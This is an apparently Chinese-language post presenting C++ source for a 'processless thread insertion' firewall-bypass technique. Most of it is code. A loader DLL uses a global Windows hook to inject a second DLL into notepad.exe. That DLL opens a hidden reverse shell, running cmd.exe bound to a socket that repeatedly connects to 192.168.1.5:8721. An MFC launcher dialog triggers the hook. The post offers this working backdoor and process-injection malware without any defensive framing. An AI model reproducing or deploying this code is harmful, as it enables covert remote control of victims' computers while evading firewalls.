vc++无进程式线程插入穿墙技术实现

加载模块核心源码

#include "Loader.h"

BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
hinst = hinstDLL;

switch(fdwReason)
{
case DLL_PROCESS_ATTACH:
//MessageBox(NULL,"DLL_PROCESS_ATTACH","",MB_OK);
//SetHook();
break;
case DLL_THREAD_ATTACH:
//MessageBox(NULL,"DLL_THREAD_ATTACH","",MB_OK);
break;
case DLL_THREAD_DETACH:
//MessageBox(NULL,"DLL_THREAD_DETACH","",MB_OK);
break;
case DLL_PROCESS_DETACH:
//MessageBox(NULL,"DLL_PROCESS_DETACH","",MB_OK);
//UnHook();
break;
default:
//MessageBox(NULL,"Default","",MB_OK);
break;
}
return TRUE;
}

void SetHook(HWND hWnd)
{
hHook = NULL;
m_hWnd = hWnd;

hHook = SetWindowsHookEx(WH_GETMESSAGE,GetMsgProc,hinst,0);
if (hHook == 0)
{
MessageBox(NULL,"Hook Unsuccess!","Warning",MB_OK|MB_ICONWARNING);
}
}

void UnHook()
{
BOOL ret = UnhookWindowsHookEx(hHook);
if (TRUE != ret)
{
MessageBox(NULL,"UnHook Unsuccess!","Warning",MB_OK|MB_ICONWARNING);
}
}

LRESULT CALLBACK GetMsgProc(int code,WPARAM wParam,LPARAM lParam)
{
CallNextHookEx(hHook,code,wParam,lParam);

static bool old = false;
char buffer[1000];
memset(buffer,0,1000);
GetModuleFileName(0,buffer,1000);

char *InsertName = _strupr(_strdup("notepad.exe"));
char *CurrentName = _strupr(_strdup(buffer));

if (strstr(CurrentName,InsertName) != NULL && old == false)
{
old = true;
HMODULE hDll = NULL;
hDll = LoadLibrary("E:\\Microsoft Visual Studio\\系统工程\\线程插入技术\\三级跳技术\\Insert\\Debug\\Insert.dll");
if (hDll == NULL)
{
MessageBox(NULL,"Insert failed!","",MB_OK|MB_ICONERROR);
}
typedef void (*RUN)(HWND);
RUN Run = (RUN)GetProcAddress(hDll,"Run");
Run(m_hWnd);
}

return 1;

return TRUE;
}

插入模块核心源码

#include "Insert.h"

BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
switch(fdwReason)
{
case DLL_PROCESS_ATTACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
ret = FALSE;
ret = TerminateThread(hThread,0);
if (ret == 0)
MessageBox(NULL,"Terminate Work Thread Failed!","Failed",MB_OK|MB_ICONERROR);
break;
default:
break;
}
return TRUE;
}

void Run(HWND hWnd)
{
hThread = NULL;
::SendMessage(hWnd,WM_CLOSE,0,0);
hThread = CreateThread(NULL,0,ThreadProc,NULL,0,NULL);
if (hThread == 0)
MessageBox(NULL,"Create Work Thread Failed!","Failed",MB_OK|MB_ICONERROR);
}

DWORD WINAPI ThreadProc(
LPVOID lpParameter
)
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,0),&wsa);

SOCKET sock;
PROCESS_INFORMATION pi;
STARTUPINFO si;
sockaddr_in addr;

memset(&addr,0,sizeof(addr));
memset(&pi,0,sizeof(pi));
memset(&si,0,sizeof(si));

addr.sin_family = AF_INET;
addr.sin_port = htons(8721);
addr.sin_addr.S_un.S_addr = inet_addr("192.168.1.5");

sock = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);

while(1)
{
sock = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
while (0 != connect(sock,(sockaddr*)&addr,sizeof(addr)))
{
//MessageBox(0,"Connect failed!","Report",MB_OK|MB_ICONERROR);
shutdown(sock,0);
Sleep(5000);
}
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.hStdInput = si.hStdError = si.hStdOutput = (void*)sock;
si.wShowWindow = SW_HIDE;
memset(&pi,0,sizeof(pi));
BOOL ret = CreateProcess(NULL,"cmd.exe",NULL,NULL,true,0,NULL,NULL,&si,&pi);
WaitForSingleObject(pi.hProcess,INFINITE);
closesocket(sock);
}
WSACleanup();
return 1;
}

执行源码

// WinExeDlg.cpp : implementation file
//

#include "stdafx.h"
#include "WinExe.h"
#include "WinExeDlg.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CAboutDlg dialog used for App About

class CAboutDlg : public CDialog
{
public:
CAboutDlg();

// Dialog Data
//{{AFX_DATA(CAboutDlg)
enum { IDD = IDD_ABOUTBOX };
//}}AFX_DATA

// ClassWizard generated virtual function overrides
//{{AFX_VIRTUAL(CAboutDlg)
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV support
//}}AFX_VIRTUAL

// Implementation
protected:
//{{AFX_MSG(CAboutDlg)
//}}AFX_MSG
DECLARE_MESSAGE_MAP()
};

CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
//{{AFX_DATA_INIT(CAboutDlg)
//}}AFX_DATA_INIT
}

void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
//{{AFX_DATA_MAP(CAboutDlg)
//}}AFX_DATA_MAP
}

BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
//{{AFX_MSG_MAP(CAboutDlg)
// No message handlers
//}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CWinExeDlg dialog

CWinExeDlg::CWinExeDlg(CWnd* pParent /*=NULL*/)
: CDialog(CWinExeDlg::IDD, pParent)
{
//{{AFX_DATA_INIT(CWinExeDlg)
// NOTE: the ClassWizard will add member initialization here
//}}AFX_DATA_INIT

h_Dll = NULL;

m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}

void CWinExeDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
//{{AFX_DATA_MAP(CWinExeDlg)
// NOTE: the ClassWizard will add DDX and DDV calls here
//}}AFX_DATA_MAP
}

BEGIN_MESSAGE_MAP(CWinExeDlg, CDialog)
//{{AFX_MSG_MAP(CWinExeDlg)
ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
ON_BN_CLICKED(IDC_BTN_LOADER, OnBtnLoader)
ON_WM_CLOSE()
//}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CWinExeDlg message handlers

BOOL CWinExeDlg::OnInitDialog()
{
CDialog::OnInitDialog();

// Add "About..." menu item to system menu.

// IDM_ABOUTBOX must be in the system command range.
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);

CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
if (!strAboutMenu.IsEmpty())
{
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}

// Set the icon for this dialog. The framework does this automatically
// when the application's main window is not a dialog
SetIcon(m_hIcon, TRUE);// Set big icon
SetIcon(m_hIcon, FALSE);// Set small icon

h_Dll = LoadLibrary("./../Loader/Debug/Loader.dll");
if (h_Dll == 0)
{
MessageBox("Load Library Error");
return false;
}

return TRUE; // return TRUE unless you set the focus to a control
}

void CWinExeDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
if ((nID & 0xFFF0) == IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
else
{
CDialog::OnSysCommand(nID, lParam);
}
}

// If you add a minimize button to your dialog, you will need the code below
// to draw the icon. For MFC applications using the document/view model,
// this is automatically done for you by the framework.

void CWinExeDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // device context for painting

SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);

// Center icon in client rectangle
int cxIcon = GetSystemMetrics(SM_CXICON);
int cyIcon = GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(&rect);
int x = (rect.Width() - cxIcon + 1) / 2;
int y = (rect.Height() - cyIcon + 1) / 2;

// Draw the icon
dc.DrawIcon(x, y, m_hIcon);
}
else
{
CDialog::OnPaint();
}
}

// The system calls this to obtain the cursor to display while the user drags
// the minimized window.
HCURSOR CWinExeDlg::OnQueryDragIcon()
{
return (HCURSOR) m_hIcon;
}

void CWinExeDlg::OnBtnLoader()
{
//ShellExecute(0,"open","about:blank",NULL,NULL,SW_HIDE);
//WinExec("C:\\Program Files\\Internet Explorer\\iexplore.exe about:blank",SW_HIDE);

typedef void (*LOAD)(HWND);
LOAD Proc = (LOAD)GetProcAddress(h_Dll,"SetHook");
if (Proc == 0)
{
MessageBox("Get Proc failed");
return;
}
Proc(m_hWnd);

}

void CWinExeDlg::OnClose()
{
typedef void (*UNLOAD)(void);
UNLOAD Proc = (UNLOAD)GetProcAddress(h_Dll,"UnHook");
if (Proc == 0)
{
MessageBox("Get Proc failed");
return;
}
Proc();

FreeLibrary(h_Dll);
CDialog::OnClose();
}